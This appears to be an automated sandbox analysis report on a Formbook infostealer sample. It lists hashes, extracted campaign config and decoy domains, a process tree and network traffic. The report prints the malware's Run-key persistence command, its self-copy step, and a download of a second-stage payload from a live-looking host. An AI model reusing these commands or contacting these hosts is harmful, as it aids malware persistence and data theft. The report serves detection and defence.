Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2024 02:49

General

  • Target

    7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe

  • Size

    28KB

  • MD5

    5ad176cf9482ccedc206fca269089b25

  • SHA1

    0b917af3c99023327127aa034d3904888029e2d3

  • SHA256

    7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021

  • SHA512

    9e9c68cd8467f5b08f514b2315025f9e863f66a2d5746f54b5d7d5df89e8b6e9c232bca3fbfedfd6450b2d1ccb37bbd630ea95c0c1bdd5150acd73fb0841d580

  • SSDEEP

    192:+YHwHj0yVgOOVinHuCN0Tv2m5g7EDum0KypCkCgS43IhS/rUO50biUU9H+v5mIAf:4AyrgCNkun7EZ3uBIhErX6mPeJACsxh

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

o62s

Decoy

lectrobay.shop

enisehirarnavutkoy.xyz

itoolz.net

otorcycle-loans-40378.bond

opjobsinusa.today

uara228j.shop

ukulbagus10.click

enhealth07.shop

cpoker.pro

ome-remodeling-16949.bond

andu.shop

hubbychicocharmqs.shop

onghi292.top

ussines-web-creators.net

alenspencer.online

ryptogigt.top

epiyiisigorta.online

ental-implants-77717.bond

juta.click

enisehirevleriarnavutkoy.xyz

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook family
  • Formbook payload 1 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
    "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2624
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021" /t REG_SZ /F /D "C:\Users\Admin\Documents\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.pif"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4776
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021" /t REG_SZ /F /D "C:\Users\Admin\Documents\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.pif"
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        PID:4084
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Copy "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe" "C:\Users\Admin\Documents\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.pif"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:900
    • C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe"
      2⤵
        PID:5020
      • C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
        "C:\Users\Admin\AppData\Local\Temp\7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3628

    Network

    • flag-us
      DNS
      rn3-sa.com
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      Remote address:
      8.8.8.8:53
      Request
      rn3-sa.com
      IN A
      Response
      rn3-sa.com
      IN A
      66.29.153.238
    • flag-us
      GET
      https://rn3-sa.com/1949
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      Remote address:
      66.29.153.238:443
      Request
      GET /1949 HTTP/1.1
      Host: rn3-sa.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      keep-alive: timeout=5, max=100
      last-modified: Fri, 29 Nov 2024 04:26:46 GMT
      accept-ranges: bytes
      content-length: 570368
      date: Sat, 07 Dec 2024 02:49:52 GMT
      server: LiteSpeed
      x-turbo-charged-by: LiteSpeed
    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      58.55.71.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      58.55.71.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      238.153.29.66.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      238.153.29.66.in-addr.arpa
      IN PTR
      Response
      238.153.29.66.in-addr.arpa
      IN PTR
      premium247-3 web-hostingcom
    • flag-us
      DNS
      25.125.209.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.125.209.23.in-addr.arpa
      IN PTR
      Response
      25.125.209.23.in-addr.arpa
      IN PTR
      a23-209-125-25deploystaticakamaitechnologiescom
    • flag-us
      DNS
      73.31.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.31.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      53.210.109.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      53.210.109.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.187.3.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.187.3.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      181.129.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      181.129.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      43.229.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      43.229.111.52.in-addr.arpa
      IN PTR
      Response
    • 66.29.153.238:443
      https://rn3-sa.com/1949
      tls, http
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      14.1kB
      593.9kB
      283
      429

      HTTP Request

      GET https://rn3-sa.com/1949

      HTTP Response

      200
    • 8.8.8.8:53
      rn3-sa.com
      dns
      7190badb11c14706725e06f01dd4dbbd34f82233d3d69f7bd302cfdb947f6021.exe
      56 B
      72 B
      1
      1

      DNS Request

      rn3-sa.com

      DNS Response

      66.29.153.238

    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
      90 B
      1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      58.55.71.13.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      58.55.71.13.in-addr.arpa

    • 8.8.8.8:53
      238.153.29.66.in-addr.arpa
      dns
      72 B
      114 B
      1
      1

      DNS Request

      238.153.29.66.in-addr.arpa

    • 8.8.8.8:53
      25.125.209.23.in-addr.arpa
      dns
      72 B
      137 B
      1
      1

      DNS Request

      25.125.209.23.in-addr.arpa

    • 8.8.8.8:53
      73.31.126.40.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      73.31.126.40.in-addr.arpa

    • 8.8.8.8:53
      241.150.49.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      241.150.49.20.in-addr.arpa

    • 8.8.8.8:53
      53.210.109.20.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      53.210.109.20.in-addr.arpa

    • 8.8.8.8:53
      198.187.3.20.in-addr.arpa
      dns
      71 B
      157 B
      1
      1

      DNS Request

      198.187.3.20.in-addr.arpa

    • 8.8.8.8:53
      181.129.81.91.in-addr.arpa
      dns
      72 B
      147 B
      1
      1

      DNS Request

      181.129.81.91.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
      128 B
      1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      43.229.111.52.in-addr.arpa
      dns
      72 B
      158 B
      1
      1

      DNS Request

      43.229.111.52.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2624-6-0x0000000074800000-0x0000000074FB0000-memory.dmp

      Filesize

      7.7MB

    • memory/2624-0-0x000000007480E000-0x000000007480F000-memory.dmp

      Filesize

      4KB

    • memory/2624-2-0x0000000004F80000-0x0000000005524000-memory.dmp

      Filesize

      5.6MB

    • memory/2624-3-0x00000000048F0000-0x0000000004982000-memory.dmp

      Filesize

      584KB

    • memory/2624-4-0x00000000049D0000-0x0000000004A46000-memory.dmp

      Filesize

      472KB

    • memory/2624-5-0x00000000048E0000-0x00000000048EA000-memory.dmp

      Filesize

      40KB

    • memory/2624-1-0x0000000000030000-0x000000000003E000-memory.dmp

      Filesize

      56KB

    • memory/2624-7-0x0000000005EB0000-0x0000000005F42000-memory.dmp

      Filesize

      584KB

    • memory/2624-10-0x00000000062A0000-0x0000000006306000-memory.dmp

      Filesize

      408KB

    • memory/2624-9-0x0000000006100000-0x000000000619C000-memory.dmp

      Filesize

      624KB

    • memory/2624-8-0x0000000005F60000-0x0000000005F7E000-memory.dmp

      Filesize

      120KB

    • memory/2624-16-0x0000000074800000-0x0000000074FB0000-memory.dmp

      Filesize

      7.7MB

    • memory/3628-14-0x00000000014C0000-0x000000000180A000-memory.dmp

      Filesize

      3.3MB

    • memory/3628-13-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.